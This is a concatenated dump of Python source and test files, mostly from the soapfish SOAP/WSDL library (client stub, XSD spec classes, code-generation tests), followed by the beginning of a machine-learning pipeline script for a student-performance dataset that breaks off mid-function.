SOAP11 = soap11
@classmethod
def get_version(cls, namespace):
if namespace == cls.SOAP11.ENVELOPE_NAMESPACE or namespace == cls.SOAP11.BINDING_NAMESPACE:
return cls.SOAP11
elif namespace == cls.SOAP12.ENVELOPE_NAMESPACE or namespace == cls.SOAP12.BINDING_NAMESPACE:
return cls.SOAP12
else:
raise ValueError("SOAP version with namespace '%s' is not supported." % namespace)
@classmethod
def get_version_name(cls, namespace):
version = cls.get_version(namespace)
return version.__name__
@classmethod
def get_version_from_xml(cls, xml):
namespaces = {'wsdl': ns.wsdl, 'soap12': ns.wsdl_soap12}
if xml.xpath('wsdl:binding/soap12:binding', namespaces=namespaces):
return cls.SOAP12
else:
return cls.SOAP11
class Service(object):
'''
Describes service aggregating information required for dispatching and
WSDL generation.
'''
def __init__(self, targetNamespace, location, schemas, methods,
version=SOAPVersion.SOAP11, name='Service',
input_header=None, output_header=None, use_wsa=False):
'''
:param targetNamespace: string
:param location: string, endpoint url.
:param schemas: xsd.Schema instances.
:param methods: list of xsd.Methods
'''
self.name = name
self.targetNamespace = targetNamespace
self.location = location
self.schemas = schemas
self.methods = methods
self.version = version
self.use_wsa = use_wsa
if use_wsa and input_header is None:
input_header = wsa.WSAsaHeader
if use_wsa and output_header is None:
output_header = wsa.WSAHeader
self.input_header = input_header
self.output_header = output_header
def get_method(self, operationName):
return next(m for m in self.methods if m.operationName == operationName)
def find_element_by_name(self, name):
element = None
for schema in self.schemas:
element = schema.get_element_by_name(name)
if element is not None:
break
return element
def route(self, operationName):
"""Decorator to bind a Python function to service method."""
method = self.get_method(operationName)
def wrapper(func):
method.function = func
return func
return wrapper
class Stub(object):
'''
Client stub. Handles only document style calls.
'''
SERVICE = None
SCHEME = 'http'
HOST = 'www.example.net'
def __init__(self, username=None, password=<PASSWORD>, service=None, location=None):
self.username = username
self.password = password
self.service = service if service else self.SERVICE
context = {'scheme': self.SCHEME, 'host': self.HOST}
if location is None:
location = lambda template, context: string.Template(template).safe_substitute(**context)
if callable(location):
self.location = location(self.service.location, context)
elif isinstance(location, six.string_types):
self.location = location
else:
raise TypeError('Expected string or callable for location.')
def _handle_response(self, method, http_headers, content):
soap = self.service.version
envelope = soap.Envelope.parsexml(content)
if envelope.Header and method and method.output_header:
response_header = envelope.Header.parse_as(method.output_header)
else:
response_header = None
if envelope.Body.Fault:
code, message, actor = soap.parse_fault_message(envelope.Body.Fault)
error = core.SOAPError(code=code, message=message, actor=actor)
raise error
if isinstance(method.output, six.string_types):
_type = self.service.find_element_by_name(method.output)._type.__class__
else:
_type = method.output
body = envelope.Body.parse_as(_type)
return core.SOAPResponse(body, soap_header=response_header)
def call(self, operationName, parameter, header=None):
'''
:raises: lxml.etree.XMLSyntaxError -- validation problems.
'''
soap = self.service.version
method = self.service.get_method(operationName)
if isinstance(method.input, six.string_types):
tagname = method.input
else:
tagname = uncapitalize(parameter.__class__.__name__)
auth = (self.username, self.password) if self.username else None
data = soap.Envelope.response(tagname, parameter, header=header)
headers = soap.build_http_request_headers(method.soapAction)
logger.info("Call '%s' on '%s'", operationName, self.location)
logger.debug('Request Headers: %s', headers)
logger.debug('Request Envelope: %s', data)
r = requests.post(self.location, auth=auth, headers=headers, data=data)
logger.debug('Response Headers: %s', r.headers)
logger.debug('Response Envelope: %s', r.content)
return self._handle_response(method, r.headers, r.content)
```
#### File: soapfish/soapfish/utils.py
```python
from __future__ import absolute_import
import hashlib
import itertools
import keyword
import logging
import os
import re
from datetime import datetime, timedelta
import requests
import six
from jinja2 import Environment, PackageLoader
from . import namespaces as ns
logger = logging.getLogger('soapfish')
# --- File Functions ----------------------------------------------------------
def resolve_location(path, cwd):
if '://' in path:
location = path
else:
path = os.path.join(cwd, path)
location = os.path.relpath(path, cwd)
cwd = os.path.dirname(path)
return path, cwd, location
def open_document(path):
if '://' in path:
logger.info('Opening remote document: %s', path)
return requests.get(path).content
else:
logger.info('Opening local document: %s', path)
with open(path, 'rb') as f:
return f.read()
# --- Template Filters --------------------------------------------------------
def remove_namespace(qname):
return qname.split(':')[-1] if qname else None
def uncapitalize(value):
if value == 'QName':
return value
return value[0].lower() + value[1:]
def schema_name(obj, location=None):
from . import xsdspec
if location:
value = location
elif isinstance(obj, xsdspec.Schema):
value = obj.targetNamespace
elif isinstance(obj, xsdspec.Import):
value = obj.namespace
elif isinstance(obj, xsdspec.Include):
value = obj.schemaLocation
else:
raise TypeError('Unable to generate schema name for %s.%s'
% (obj.__class__.__module__, obj.__class__.__name__))
try:
value = value.encode()
except UnicodeEncodeError:
pass
# no cryptographic requirement here, so use md5 for fast hash:
return hashlib.md5(value).hexdigest()[:5]
def schema_select(schemas, elements):
selected = None
elements = [remove_namespace(x) for x in elements]
for schema in schemas:
if all(schema.get_element_by_name(x) for x in elements):
selected = schema
break
return selected
def get_rendering_environment(xsd_namespaces, module='soapfish'):
'''
Returns a rendering environment to use with code generation templates.
'''
from . import soap, xsd, xsdspec, wsdl
def capitalize(value):
return value[0].upper() + value[1:]
def use(value):
from . import xsd
if value == xsd.Use.OPTIONAL:
return 'xsd.Use.OPTIONAL'
if value == xsd.Use.REQUIRED:
return 'xsd.Use.REQUIRED'
if value == xsd.Use.PROHIBITED:
return 'xsd.Use.PROHIBITED'
raise ValueError('Unknown value for use attribute: %s' % value)
def url_regex(url):
o = six.moves.urllib.parse.urlparse(url)
return r'^%s$' % re.escape(o.path.lstrip('/'))
def url_component(url, item):
parts = six.moves.urllib.parse.urlparse(url)
try:
return getattr(parts, item)
except AttributeError:
raise ValueError('Unknown URL component: %s' % item)
def url_template(url):
o = list(six.moves.urllib.parse.urlparse(url))
o[0:2] = ['${scheme}', '${host}']
return six.moves.urllib.parse.urlunparse(o)
def get_type(obj, known_types=None):
qname = None
if isinstance(obj, (xsdspec.Attribute, xsdspec.Element)):
if obj.ref:
qname = obj.ref
elif obj.type:
qname = obj.type
elif obj.simpleType:
# FIXME: Determine how to handle embedded types...
raise NotImplementedError('Unable to handle embedded type.')
elif isinstance(obj, (xsdspec.Extension, xsdspec.Restriction)):
if obj.base:
qname = obj.base
elif isinstance(obj, six.string_types):
qname = obj
if not qname:
raise ValueError('Unable to determine type of %s' % obj)
qname = qname.split(':')
if len(qname) < 2:
qname.insert(0, None)
ns, name = qname
name = capitalize(name)
if ns in xsd_namespaces:
return 'xsd.%s' % name
elif known_types is not None and name in known_types:
return '%s' % name
else:
return "__name__ + '.%s'" % name
# XXX: Python 2: Add extra values that should be considered keywords.
keywords = set(keyword.kwlist + ['False', 'None', 'True'])
env = Environment(
extensions=['jinja2.ext.do', 'jinja2.ext.loopcontrols'],
loader=PackageLoader('soapfish', 'templates'),
)
env.filters.update(
capitalize=capitalize,
fix_keyword=lambda x: '_%s' % str(x) if str(x) in keywords else str(x),
max_occurs=lambda x: 'xsd.UNBOUNDED' if x is xsd.UNBOUNDED else str(x),
remove_namespace=remove_namespace,
type=get_type,
url_component=url_component,
url_regex=url_regex,
url_template=url_template,
use=use,
)
env.globals.update(
SOAPTransport=soap.SOAP_HTTP_Transport,
keywords=keywords,
get_by_name=wsdl.get_by_name,
get_message_header=wsdl.get_message_header,
get_message_object=wsdl.get_message_object,
preamble={
'module': module,
'generated': datetime.now(),
},
schema_name=schema_name,
schema_select=schema_select,
)
return env
# --- Other Functions ---------------------------------------------------------
def find_xsd_namespaces(xml):
nsmap = xml.nsmap.copy()
for x in xml.xpath('//*[local-name()="schema"]'):
nsmap.update(x.nsmap)
return {k for k, v in six.iteritems(nsmap) if v in (ns.xsd, ns.xsd2000)}
def walk_schema_tree(schemas, callback, seen=None):
if seen is None:
seen = {}
for schema in schemas:
for item in itertools.chain(schema.imports, schema.includes):
if item.location not in seen:
seen[item.location] = callback(item)
walk_schema_tree([item], callback, seen)
return seen
def timezone_offset_to_string(offset):
'''
Returns a XSD-compatible string representation of a time zone UTC offset
(timedelta).
e.g. timedelta(hours=1, minutes=30) -> '+01:30'
'''
# Please note that this code never uses 'Z' for UTC but returns always the
# full offset (which is completely valid as far as the XSD spec goes).
# The main reason for that (besides slightly simpler code) is that checking
# for "UTC" is more complicated than one might suspect. A common failure is
# to check for a UTC offset of 0 and the absence of winter/summer time.
# However there are time zones (e.g. Africa/Ghana) which satisfy these
# criteria as well but are NOT UTC. In particular the local government may
# decide to introduce some kind of winter/summer time while UTC is
# guaranteed to have no such things.
sign = '+' if (offset >= timedelta(0)) else '-'
offset_seconds = abs((offset.days * 24 * 60 * 60) + offset.seconds)
hours = offset_seconds // 3600
minutes = (offset_seconds % 3600) // 60
return '%s%02d:%02d' % (sign, hours, minutes)
```
#### File: soapfish/soapfish/xsdspec.py
```python
from __future__ import absolute_import
import itertools
from . import namespaces as ns, xsd
XSD_NAMESPACE = ns.xsd
class Enumeration(xsd.ComplexType):
value = xsd.Attribute(xsd.String)
@classmethod
def create(cls, value):
enum = Enumeration()
enum.value = value
return enum
class Pattern(xsd.ComplexType):
NAMESPACE = ns.xsd
value = xsd.Attribute(xsd.String)
class RestrictionValue(xsd.ComplexType):
NAMESPACE = ns.xsd
value = xsd.Attribute(xsd.String)
def __repr__(self):
return 'RestrictionValue<%r>' % self.value
class Restriction(xsd.ComplexType):
NAMESPACE = ns.xsd
base = xsd.Attribute(xsd.String)
enumerations = xsd.ListElement(Enumeration, 'enumeration')
pattern = xsd.Element(Pattern)
minInclusive = xsd.Element(RestrictionValue)
minExclusive = xsd.Element(RestrictionValue)
maxExclusive = xsd.Element(RestrictionValue)
maxInclusive = xsd.Element(RestrictionValue)
fractionDigits = xsd.Element(RestrictionValue)
totalDigits = xsd.Element(RestrictionValue)
length = xsd.Element(RestrictionValue)
minLength = xsd.Element(RestrictionValue)
maxLength = xsd.Element(RestrictionValue)
whiteSpace = xsd.Element(RestrictionValue)
def to_python(self):
return '[%s]' % ', '.join("'%s'" % e.value for e in self.enumerations)
class List(xsd.ComplexType):
NAMESPACE = ns.xsd
pass
class SimpleType(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
restriction = xsd.Element(Restriction, minOccurs=0)
list = xsd.Element(List, minOccurs=0)
class Element(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
type = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
ref = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
minOccurs = xsd.Attribute(xsd.Integer, use=xsd.Use.OPTIONAL)
maxOccurs = xsd.Attribute(xsd.MaxOccurs, use=xsd.Use.OPTIONAL)
nillable = xsd.Attribute(xsd.Boolean, use=xsd.Use.OPTIONAL)
substitutionGroup = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL) # FIXME: Should use xsd.List(xsd.QName)?
simpleType = xsd.Element(SimpleType, minOccurs=0)
complexType = xsd.Element('soapfish.xsdspec.XSDComplexType')
class Sequence(xsd.ComplexType):
NAMESPACE = ns.xsd
elements = xsd.ListElement(Element, 'element')
class Attribute(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String)
ref = xsd.Attribute(xsd.String)
type = xsd.Attribute(xsd.String)
use = xsd.Attribute(xsd.String)
simpleType = xsd.Element(SimpleType, minOccurs=0)
class AttributeGroup(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String)
attributes = xsd.ListElement(Attribute, 'attribute')
class AttributeGroupReference(xsd.ComplexType):
NAMESPACE = ns.xsd
ref = xsd.Attribute(xsd.String)
def to_python(self):
typename = get_type(self.ref)
data = {'name': typename.lower(), 'type': typename}
return ''' %(name)s = xsd.Ref(%(type)s)\n''' % data
class Extension(xsd.ComplexType):
NAMESPACE = ns.xsd
base = xsd.Attribute(xsd.String)
sequence = xsd.Element(Sequence)
attributes = xsd.ListElement(Attribute, 'attribute')
attributeGroups = xsd.ListElement(AttributeGroupReference, 'attributeGroup')
class ComplexContent(xsd.ComplexType):
NAMESPACE = ns.xsd
mixed = xsd.Attribute(xsd.Boolean)
extension = xsd.Element(Extension)
restriction = xsd.Element(Extension)
class XSDComplexType(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
sequence = xsd.Element(Sequence)
choice = xsd.Element(Sequence)
all = xsd.Element(Sequence)
complexContent = xsd.Element(ComplexContent)
attributes = xsd.ListElement(Attribute, 'attribute')
attributeGroups = xsd.ListElement(AttributeGroupReference, 'attributeGroup')
class Group(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String)
sequence = xsd.Element(Sequence)
class Import(xsd.ComplexType):
schemaLocation = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
namespace = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
class Include(xsd.ComplexType):
schemaLocation = xsd.Attribute(xsd.String)
class Schema(xsd.ComplexType):
NAMESPACE = ns.xsd
targetNamespace = xsd.Attribute(xsd.String)
elementFormDefault = xsd.Attribute(
xsd.String(enumeration=['qualified', 'unqualified']),
use=xsd.Use.OPTIONAL, default='unqualified',
)
imports = xsd.ListElement(Import, 'import')
includes = xsd.ListElement(Include, 'include')
simpleTypes = xsd.ListElement(SimpleType, 'simpleType')
groups = xsd.ListElement(Group, 'group')
attributeGroups = xsd.ListElement(AttributeGroup, 'attributeGroup')
complexTypes = xsd.ListElement(XSDComplexType, 'complexType')
elements = xsd.ListElement(Element, 'element')
def get_element_by_name(self, name):
# FIXME: Handle imported and included schemas.
for element in self.elements:
if name == element.name:
return element
else:
return None
SCHEMA = xsd.Schema(
targetNamespace=ns.xsd,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED,
simpleTypes=[],
attributeGroups=[],
groups=[],
complexTypes=[Enumeration, Pattern, RestrictionValue, Restriction, List,
SimpleType, Element, Sequence, Attribute, AttributeGroup,
AttributeGroupReference, Extension, ComplexContent,
XSDComplexType, Group, Schema],
elements={},
)
```
#### File: tests/framework/django_test.py
```python
from __future__ import absolute_import
import unittest
from collections import namedtuple
from datetime import datetime
from soapfish.django_ import django_dispatcher
from soapfish.testutil import echo_service, framework
try:
import django
from django.conf import settings
except ImportError:
django = None
else:
settings.configure(
ALLOWED_HOSTS=['testserver'],
ROOT_URLCONF=None,
DEBUG=True,
DEBUG_PROPAGATE_EXCEPTIONS=True,
EMAIL_BACKEND='django.core.mail.backends.dummy.EmailBackend',
LOGGING_CONFIG=None,
USE_I18N=False,
USE_TZ=True,
)
from django.conf.urls import url
from django.test import Client
urlconf = namedtuple('urlconf', 'urlpatterns')
@unittest.skipIf(django is None, 'Django is not installed.')
class DjangoDispatchTest(framework.DispatchTestMixin, unittest.TestCase):
def setUp(self): # noqa
self.service = echo_service()
settings.ROOT_URLCONF = urlconf(urlpatterns=(url(r'^ws/$', django_dispatcher(self.service)),))
self.client = Client()
def _prepare_extras(self, headers):
extras = {'HTTP_' + k.replace('-', '_').upper(): v for k, v in headers.items()}
extras.update(content_type=headers['Content-Type'])
return extras
def test_can_retrieve_wsdl(self):
response = self.client.get('/ws/', {'wsdl': None})
self.assertEquals(200, response.status_code)
self.assertEquals('text/xml', response['Content-Type'])
self.assertIn(b'<wsdl:definitions', response.content)
def test_can_dispatch_simple_request(self):
input_value = str(datetime.now())
headers, body = self._soap_request(input_value)
extras = self._prepare_extras(headers)
response = self.client.post('/ws/', body, **extras)
self.assertEquals(200, response.status_code)
body = self._soap_response(response.content)
self.assertEquals(input_value, body.value)
```
#### File: tests/generation/code_test.py
```python
import os
import tempfile
import textwrap
import unittest
import six
from lxml import etree
from pythonic_testcase import (
assert_contains,
assert_equals,
assert_not_contains,
)
from soapfish import py2wsdl, utils, wsdl2py, xsd2py
class CodeGenerationTest(unittest.TestCase):
def _exec(self, code, globalz):
_, fn = tempfile.mkstemp(suffix='.py')
header = textwrap.dedent('''\
# -*- coding: utf-8 -*-
import sys
sys.path.append(r'{0}')
''').format(os.path.dirname(fn).rstrip('\\')).encode('utf8')
code = header + b'\n' + code + b'\n'
with open(fn, 'wb') as f:
f.write(code)
compile(code, fn, 'exec')
globalz['__name__'] = os.path.basename(fn).rsplit('.', 1)[0]
six.exec_(code, globalz)
def _check_reparse_wsdl(self, base, target):
tree = py2wsdl.generate_wsdl(base['PutOpsPort_SERVICE'])
xml = etree.tostring(tree, pretty_print=True)
code = wsdl2py.generate_code_from_wsdl(xml, target)
m = {}
self._exec(code, m)
# XXX too much autonaming magic
m['PutOpsPort_SERVICE'] = m.pop('PutOpsPortPort_SERVICE')
if target == 'client':
m['PutOpsPortServiceStub'] = m.pop('PutOpsPortPortServiceStub')
assert_equals(sorted(m), sorted(base))
def test_code_generation_from_xsd(self):
xml = utils.open_document('tests/assets/generation/default.xsd')
# Add mandatory imports to test the generated code
code = xsd2py.generate_code_from_xsd(xml)
self._exec(code, {})
def test_code_generation_from_wsdl_client(self):
xml = utils.open_document('tests/assets/generation/default.wsdl')
code = wsdl2py.generate_code_from_wsdl(xml, 'client')
m = {}
self._exec(code, m)
self._check_reparse_wsdl(m, 'client')
def test_code_generation_from_wsdl_server(self):
xml = utils.open_document('tests/assets/generation/default.wsdl')
code = wsdl2py.generate_code_from_wsdl(xml, 'server')
m = {}
self._exec(code, m)
self._check_reparse_wsdl(m, 'server')
def test_relative_paths(self):
path = 'tests/assets/relative/relative.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'server', cwd=os.path.dirname(path))
if six.PY3:
code = code.decode()
assert_contains('Schema2_Element', code)
assert_contains('Schema3_Element', code)
assert_equals(1, code.count('Schema3_Element'))
def test_import_same_namespace(self):
path = 'tests/assets/same_namespace/same_namespace.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'server', cwd=os.path.dirname(path))
if six.PY3:
code = code.decode()
assert_contains('Schema1_Element', code)
assert_contains('Schema2_Element', code)
def test_schema_xsd_include(self):
path = 'tests/assets/include/include.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'server', cwd=os.path.dirname(path))
if six.PY3:
code = code.decode()
assert_contains('Schema1_Element', code)
def test_schema_xsd_restriction(self):
xml = utils.open_document('tests/assets/generation/restriction.xsd')
code = xsd2py.generate_code_from_xsd(xml)
if six.PY3:
code = code.decode()
assert_contains('RestrictedString', code)
assert_contains("pattern=r'[a-z]+'", code)
def test_create_method_list_param(self):
xml = utils.open_document('tests/assets/generation/list_param.xsd')
code = xsd2py.generate_code_from_xsd(xml)
if six.PY3:
code = code.decode()
assert_contains('def create(cls, Items):', code)
assert_contains('instance.Items = Items', code)
assert_not_contains('Itemss', code)
```
#### File: tests/generation/wsdl_code_test.py
```python
import os
import mock
import unittest
from pythonic_testcase import (
PythonicTestCase,
assert_equals,
assert_is_not_empty,
assert_isinstance,
assert_length,
)
from soapfish import utils, wsdl2py, xsd
from soapfish.testutil import generated_symbols
class WSDLCodeGenerationTest(PythonicTestCase):
def test_can_generate_code_for_simple_wsdl_import(self):
path = 'tests/assets/generation/import_simple.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'client', cwd=os.path.dirname(path))
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
def test_can_generate_code_for_nested_wsdl_import(self):
path = 'tests/assets/generation/import_nested.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'client', cwd=os.path.dirname(path))
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
def test_can_generate_code_for_looped_wsdl_import(self):
path = 'tests/assets/generation/import_looped.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'client', cwd=os.path.dirname(path))
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
def test_can_generate_code_for_two_schemas(self):
xml = utils.open_document('tests/assets/generation/multi_schema.wsdl')
code = wsdl2py.generate_code_from_wsdl(xml, 'client')
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
assert_length(2, [s for s in symbols if s.startswith('Schema_')])
assert_equals(['A'], list(schemas[0].elements))
assert_equals(['B'], list(schemas[1].elements))
@unittest.skip('Cannot generate code for wsdl with type inheritance')
def test_can_generate_code_for_inheritance(self):
xml = utils.open_document('tests/assets/generation/inheritance.wsdl')
code = wsdl2py.generate_code_from_wsdl(xml, 'client')
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
assert_length(4, symbols)
assert_equals(['B', 'A'], list(schemas[0].elements))
assert_isinstance(schemas[0].elements['B']._type, xsd.String)
assert_isinstance(schemas[0].elements['A']._type, schemas[0].elements['B']._type.__class__)
def test_can_generate_remote_tree(self):
def _mock(path):
if path == 'http://example.org/xsd/simple_element.xsd':
filename = 'tests/assets/generation/simple_element.xsd'
else:
self.fail('Unexpected remote path: %s' % path)
with open(filename, 'rb') as f:
return f.read()
xml = utils.open_document('tests/assets/generation/import_remote.wsdl')
with mock.patch('soapfish.xsd2py.open_document') as p:
p.side_effect = _mock
code = wsdl2py.generate_code_from_wsdl(
xml,
'client',
cwd='http://example.org/code/')
schemas, symbols = generated_symbols(code)
```
#### File: soapfish/tests/py2xsd_test.py
```python
from __future__ import absolute_import, unicode_literals
from lxml import etree
from pythonic_testcase import PythonicTestCase, assert_false, assert_true
from soapfish import xsd
from soapfish.py2xsd import generate_xsd
class py2xsdTest(PythonicTestCase):
def test_can_generate_schema_xml_containing_types_with_pattern_restriction(self):
ns = 'http://soap.example/pattern.xsd'
class Container(xsd.ComplexType):
code = xsd.Element(xsd.String(pattern='[0-9]{0,5}'))
schema = xsd.Schema(ns,
location=ns,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED,
complexTypes=(
Container,
),
elements={
'foo': xsd.Element(Container),
},
)
# previously this would fail
xsd_element = generate_xsd(schema)
xmlschema = etree.XMLSchema(xsd_element)
valid_xml = '<foo xmlns="%s"><code>1234</code></foo>' % ns
def is_valid(s):
return xmlschema.validate(etree.fromstring(s))
assert_true(is_valid(valid_xml))
bad_xml = '<foo xmlns="%s"><code>abc</code></foo>' % ns
assert_false(is_valid(bad_xml))
```
#### File: soapfish/tests/soap11_test.py
```python
from __future__ import absolute_import
from lxml import etree
from pythonic_testcase import PythonicTestCase, assert_contains
from soapfish.soap11 import Code, get_error_response
class SOAP11Test(PythonicTestCase):
def test_get_error_response(self):
response = get_error_response(Code.SERVER, u'some error', actor='me')
xml = self._xml_strip(response)
assert_contains(b'<faultcode>Server</faultcode>', xml)
assert_contains(b'<faultactor>me</faultactor>', xml)
def _xml_strip(self, xml):
parser = etree.XMLParser(remove_blank_text=True)
return etree.tostring(etree.fromstring(xml, parser=parser))
```
#### File: tests/xsd/schema_test.py
```python
from pythonic_testcase import PythonicTestCase, assert_equals, assert_none
from soapfish import xsd
class SchemaTest(PythonicTestCase):
def test_can_lookup_element_by_name(self):
ns = 'http://soap.example/schema.xsd'
class CodeType(xsd.String):
pattern = r'[0-9]{5}'
schema = xsd.Schema(ns,
location=ns,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED,
simpleTypes=[CodeType],
elements={'code': xsd.Element(CodeType)}
)
schema_element = schema.get_element_by_name('code')
assert_equals(CodeType, schema_element._passed_type)
assert_none(schema.get_element_by_name('invalid'))
``` |
{
"source": "JocCordova/XAIplayground",
"score": 3
} |
#### File: XAIplayground/pipeline/Main.py
```python
import os
import numpy as np
from sys import platform, path
if platform == "linux" or platform == "linux2":
path.insert(1, os.path.dirname(os.getcwd()) + "/src")
FILE_NAME = os.path.dirname(os.getcwd()) + "/data" + "/xAPI-Edu-Data-Edited.csv"
elif platform == "win32":
path.insert(1, os.path.dirname(os.getcwd()) + "\\src")
FILE_NAME = os.path.dirname(os.getcwd()) + "\\data" + "\\xAPI-Edu-Data-Edited.csv"
elif platform == "darwin":
path.insert(1, os.path.dirname(os.getcwd()) + "/src")
FILE_NAME = os.path.dirname(os.getcwd()) + "/data" + "/xAPI-Edu-Data-Edited.csv"
from DataPreprocessing import Preprocess, FeaturePreprocess
from DataProcessing import ModelTuning, ModelValidating, save_file, load_file
CATEGORICAL_COLUMNS = ["Gender", "Nationality", "PlaceofBirth", "StageID", "GradeID", "SectionID", "Topic",
"Semester", "Relation", "ParentAnsweringSurvey", "ParentSchoolSatisfaction",
"StudentAbsenceDays"]
PREFIXES = ["Gender", "Nationality", "PlaceofBirth", "Stage", "Grade", "Section", "Topic",
"Semester", "Relation", "Survey", "ParentSatisfaction",
"Absence"]
REMOVE_VALUES = ["G-05", "G-09"]
def preprocess_data(count_missing=False, replace_values=True, remove_values=False, encode=True,
categorical_columns=CATEGORICAL_COLUMNS,
prefixes=PREFIXES):
"""Preprocesses the raw dataset
Parameters
----------
count_missing : bool, default=False
Counts all missing values in the dataset
replace_values : bool, default=True
Replaces non significative values in the columns "Nationality" and "PlaceofBirth" with "Other"
remove_values : bool, default=False
Replaces rows with non significative values in the columns "GradeID"
encode : bool, default=True
One Hot encodes categorical columns
categorical_columns : list of str, defaut=(categorical columns of the dataset)
Columns to apply one hot encode to
prefixes : list of str, default="["Gender", "Nationality", "PlaceofBirth", "Stage", "Grade", "Section", "Topic",
"Semester", "Relation", "Survey", "ParentSatisfaction",
"Absence"]"
Prefixes for one hot encoding
Returns
----------
X_data : pandas df
feature columns
y_data : pandas df
target columns
y_labels : {ndarray, sparse matrix}
class labels
"""
preprocess = Preprocess(data=FILE_NAME)
if count_missing:
print(f"Number of rows missing values: {preprocess.check_missing_values()}")
if replace_values:
preprocess.replace_values("Nationality",
["Lybia", "Iraq", "Lebanon", "Tunisia", "SaudiArabia", "Egypt", "USA", "Venezuela",
"Iran", "Morocco", "Syria", "Palestine"], "Other")
preprocess.replace_values("PlaceofBirth",
["Lybia", "Iraq", "Lebanon", "Tunisia", "SaudiArabia", "Egypt", "USA", "Venezuela",
"Iran", "Morocco", "Syria", "Palestine"], "Other")
if remove_values:
preprocess.remove_values("GradeID", REMOVE_VALUES)
if encode:
preprocess.target_encode()
preprocess.one_hot_encode(columns=categorical_columns, prefix=prefixes)
X_data, y_data = preprocess.get_data()
y_labels = preprocess.target_decode()
return X_data, y_data, y_labels
X_data, y_data = preprocess.get_data()
return X_data, y_data
def preprocess_features(X_data, scaler_type="standard", n_components=None, plot_pca=False, threshold=0.85,
savefig=True):
"""
processes feature columns with a scaler and pca
Parameters
----------
X_data : pandas df
feature Columns
scaler_type : str, default="standard"
scalar to use ('standard'/'min_max')
n_components : int, default=None
pca components to use, if 'None' uses all components
plot_pca : bool, defaut=True
specifies if pca should be plotted
threshold : float range(0,1), default=0.85
pca variance threshold to plot vertical line at
savefig : bool, default=True
specifies if pca plot should be saved
Returns
----------
X_transformed : ndarray
preprocessed feature columns
feature_preprocess : feature_preprocess object
feature_preprocess object used (for the pipeline)
"""
if n_components is None:
n_components = len(X_data.columns)
feature_preprocess = FeaturePreprocess(X_data, n_components=n_components, scaler_type=scaler_type)
X_transformed = feature_preprocess.transform_data()
if plot_pca:
feature_preprocess.plot_pca(threshold=threshold, savefig=savefig)
return X_transformed, feature_preprocess
def create_estimators(X_data, y_data, train_size=0.7, hyperparam_tune=True, boosting=True, random_state=42,
verbose=1):
"""Splits the data in train, test and val, trains three different estimators: Decision Tree, Support Vector Machine
and Random Forest, can also tune the hyper parameters and boost the estimators with Adaboost
Parameters
----------
X_data : pandas df
feature Columns
y_data : pandas df
target column
train_size : float
Percentage for train
hyperparam_tune : bool, default=True
specifies if hyper params should be tuned
boosting : bool, default=True
specifies if estimators should be boosted
random_state : int, default=42
random state
verbose : int, default=1
verbosity level
Returns
----------
estimators : list of estimators
trained estimators
mt : ModelTuning object
ModelTuning object used (for validation set)
"""
estimators = []
mt = ModelTuning(X_data, y_data, train_size, random_state=random_state)
if verbose > 0:
print("Creating Basic Estimators...\n")
dt = mt.create_weak_learner(random_state, verbose, model_type="dt", )
svm = mt.create_weak_learner(random_state, verbose, model_type="svm")
rf = mt.create_random_forest(random_state, verbose)
estimators.extend([dt, svm, rf])
if hyperparam_tune:
if verbose > 0:
print("Tunning Hyperparams...\n")
tuned_dt = mt.tune_hyperparam(dt, random_state, verbose)
tuned_svm = mt.tune_hyperparam(svm, random_state, verbose)
tuned_rf = mt.tune_hyperparam(rf, random_state, verbose)
estimators.extend([tuned_dt, tuned_svm, tuned_rf])
if boosting:
if verbose > 0:
print("Boosting...\n")
print("Boosted dt:")
boosted_dt = mt.boost_weak_learners(tuned_dt, random_state, verbose)
if verbose > 0:
print("Boosted svm:")
boosted_svm = mt.boost_weak_learners(tuned_svm, random_state, verbose)
if verbose > 0:
print("Boosted rf:")
boosted_rf = mt.boost_weak_learners(tuned_rf, random_state, verbose)
estimators.extend([boosted_dt, boosted_svm, boosted_rf])
return estimators, mt
def get_x_y_set(mt, type="test"):
"""Gets data set from ModelTuning object
Parameters
----------
mt : ModelTuning object
ModelTuning object used
type : str, default="test"
specifies which set to return ('train'/'test'/'val')
Returns
----------
X_data, y_data : ndarray
"""
if type == "val":
return mt.get_validation_set()
if type == "train":
return mt.get_train_set()
if type == "test":
return mt.get_test_set()
def validate_estimators(estimators, X_val, y_val, y_labels, scaler_type="", plot_cf=True, clas_report=True,
savefig=True):
"""Validates estimators
Parameters
----------
estimators : list of estimators
estimators to validate
X_val : ndarray
validation data
y_val : ndarray
validation labels
y_labels : {ndarray, sparse matrix}
decoded labels
scaler_type : str, optional
scaler used ('standard'/'min_max') (for plots)
plot_cf : bool, default=True
specifies if confusion matrix should be plot
clas_report : bool, default=True
specifies if Classification Report should be printed
savefig : bool, default=True
specifies if confusion matrix should be saved as .png
"""
for est in estimators:
